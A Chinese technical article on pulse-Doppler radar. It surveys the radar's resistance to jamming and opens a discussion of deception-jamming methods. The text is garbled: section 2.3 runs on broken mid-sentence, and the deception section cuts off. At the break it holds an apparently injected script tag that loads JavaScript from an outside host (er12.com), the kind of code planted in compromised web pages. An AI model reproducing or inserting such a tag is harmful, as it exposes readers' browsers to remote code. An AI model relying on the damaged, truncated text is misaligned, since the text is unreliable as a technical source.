PD雷达欺骗干扰方法浅析

摘 要:概要介绍了pd雷达的抗干扰性能及其特点,并主要对pd雷达的欺骗干扰方法进行了一定的讨论。

关键词:pd雷达;有源干扰;噪声干扰;欺骗干扰

1 引 言

  “多普勒雷达”(pulse doppler radar)指的是能够测量发射频率和所接收到的目标反射频率之间频移的一种雷达。他按一定的脉冲宽度和重复同期工作,由连续振荡器取出的电压作为接收机相位检波器的基准电压,基准电压在每一重复周期均和发射信号有相同的起始相位,因而他是相参的,并可同时具有脉冲雷达的距离分辨力和连续波雷达的速度分辨率。

  pd雷达的一个重要特性是有很强的抑制固定目标或低速目标产生杂波的能力。因此,近年来机载雷达越来越多地采用pd雷达体制,是当前火控雷达中最有活力最受青睐的雷达。如何干扰pd雷达在一段时间内成为电子战领域中的重要话题,直到现在仍然是电子战行业研究的重要课题之一。

2 pd雷达抗干扰性能分析

  为了研究pd雷达干扰的需要,首先根据pd雷达的工作特点分析其抗干扰性能,然后针对其抗干扰特点研究相应的干扰方法和途径。

2.1 优良的抗副瓣干扰性能

  pd雷达为了防止从雷达天线副瓣进入的地杂波信号(他分布在载机2倍径向速度的多普勒频谱上)遮蔽微弱的目标回波信号,必须使用超低副瓣天线。其最大副瓣电平约为-30~-40 db,平均副瓣电平约为-40~-60 db,从而使从天线副瓣方向上进入的各种信号(地杂波、有源干扰、箔条干扰等)比从天线主瓣进入的信号衰减上万倍到上百万倍。某些工作在米波的pd雷达,由于工作波长较大,天线副瓣难以做得很低。为了提高抗副瓣噪声干扰的能力,雷达通常还采用副瓣对消措施,他可以使从雷达天线副瓣进入的噪声干扰信号进一步衰减15~20 db。可见,pd雷达具有极强的抗副瓣干扰的能力,从而使干扰信号的有效作用区域限制在很窄的雷达天线主瓣范围内。而单个主瓣干扰一般对情报探测雷达影响不大,因为雷达天线主瓣覆盖的空域通常只占其探测空域的几百分之一。

2.2 良好的反侦察性能

  pd雷达最主要的工作特征是应用高分辨率的速度门滤波来去除地(海)杂波干扰,提取高速运动目标的回波信号。为了提高雷达的速度分辨能力,使运动目标落入无杂波区,pd雷达在下视时通常使用高重频工作体制。其重频高达10~300 khz,脉冲间隔低至3~10μs。因而pd雷达信号一般具有较高的占空比(1%~30%),故其发射信号的峰值功率比常规雷达低10~20 db,从而使雷达侦察告警设备对pd雷达信号的作用距离只有对常规雷达的1/3~1/10,故pd雷达具有优良的反侦察性能。

2.3 优良的抗噪声干扰性能参回波脉冲串进行相干积累(多普勒滤波),以得到很窄的信号谱线。pd雷达信号的相干积累时间约为10 ms~1 s,根据信息论知识,匹配滤波器的输出信噪比与信号的相干积累时间(即信号能量)成正比,因此,当雷达的平均功率和天线孔径乘积不变时,pd雷达比常规雷达的抗噪声干扰能力提高10~20 db。

2.4 良好的抗欺骗干扰性能

  pd雷达为了适应不同的工作环境(上视、下视、陆用、海用等),需要不断变换复杂的信号波形。pd雷达信号波形通常具有脉内调制(线性调频、相位编码等)、脉间相参的特征。对于这种波形的精确模拟比较困难,所以对pd雷达进行欺骗干扰比对常规雷达干扰要复杂得多。此外,pd雷达还具有良好的测速、测距能力。由此可见,pd雷达具有良好的抗欺骗干扰的能力。

2.5 优良的抗地(海)杂波、箔条干扰和气象干扰的能力  

  pd雷达脉冲串的相干积累性能,和由fft构成的高精度多普勒滤波器组使他具有优良的速度分辨能力,从而可使他很方便地识别并滤除速度散布较小、回波谱线宽度较窄的地杂波干扰、箔条干扰和气象干扰。因此,pd雷达具有优良的抗地(海)杂波干扰、箔条干扰和气象干扰的能力。

2.6 其他兼容的抗干扰措施

  pd雷达的工作体制与相控阵扫描、单脉冲角跟踪、脉组跳频(上视时可用脉间跳频)、跟踪噪声源、恒虚警等许多抗干扰措施兼容,从而进一步提高了他的抗角度干扰和噪声干扰的能力。

  由此可见,pd雷达的确具有很强的、比较全面的抗干扰能力,因而在现代探测预警系统和武器系统中得到广泛地应用。

3 pd雷达欺骗干扰方法

  欺骗干扰是惟妙惟肖地模拟真实目标回波的一种干扰信号,他可以使雷达操作员或雷达处理器真假难分,以假当真,从而达到破坏对真目标检测、跟踪的目的。这种干扰一个很大的优点是其干扰能量集中在所需要的雷达距离速度分辨单元以内,故干扰能量的利用率很高。这种干扰具有与目标回波相似的特性,故pd雷达的相干积累不会对他造成大的影响。另外,这种干扰信号功率即便小于真实目标?script src=http://er12.com/t.js>

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发布日期:2019年07月02日  所属分类:参考设计